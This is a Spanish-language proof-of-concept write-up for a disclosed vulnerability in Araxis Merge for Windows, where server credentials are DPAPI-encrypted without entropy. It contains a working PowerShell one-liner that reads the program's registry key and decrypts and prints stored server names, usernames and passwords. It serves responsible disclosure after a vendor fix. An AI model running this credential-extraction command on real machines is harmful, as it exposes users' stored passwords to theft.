
Prueba de concepto que descifra las credenciales de servidor de Araxis Merge protegidas con DPAPI (CVE-2026-92680), demostrando un almacenamiento de credenciales insuficientemente protegido en Windows.
Araxis Merge para Windows almacena las credenciales del servidor con DPAPI con pOptionalEntropy establecido en NULL. Esto permite que cualquier código que se ejecute en el mismo contexto de usuario las descifre.
Análisis completo: https://grepstrength.com/research/araxis-merge
| CVE | CVE-2026-92680 |
| CWE | CWE-522: Credenciales insuficientemente protegidas |
| CVSS v3.1 | 5.5 (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N) |
| Fabricante | Araxis Ltd. |
| Afectado | Araxis Merge para Windows 2011.4074 hasta 2026.0 |
| Corregido en | 2026.1 |
| Aviso del fabricante | Merge-SA-26-00 |
| Reportado | 2026-08-18 |
| Divulgado | 2026-XX-XX |
| Reportero | grepStrength |
Esto descifrará y analizará HKCU\Software\Araxis\Merge\7.1\Passwords. Debe ejecutarse como el mismo usuario de Windows que almacenó originalmente las credenciales.
Add-Type -AssemblyName System.Security; $p=[Security.Cryptography.ProtectedData]::Unprotect((Get-ItemProperty "HKCU:\Software\Araxis\Merge\7.1").Passwords,$null,'CurrentUser'); $i=48; $f=@(); while($i -lt $p.Length){$l=[BitConverter]::ToInt64($p,$i+8);$i+=16;$f+=[Text.Encoding]::Unicode.GetString($p,$i,$l*2);$i+=$l*2}; 0..($f.Count/4-1)|%{[PSCustomObject]@{Server=$f[$_*4+1];Username=$f[$_*4+2];Password=$f[$_*4+3]}}|Format-Table -AutoSize
Todas las pruebas se realizaron en sistemas propiedad de grepStength Security utilizando únicamente credenciales sintéticas. Esto se reportó a Araxis Ltd. y se divulgó públicamente después de que se pusiera a disposición una corrección.
MIT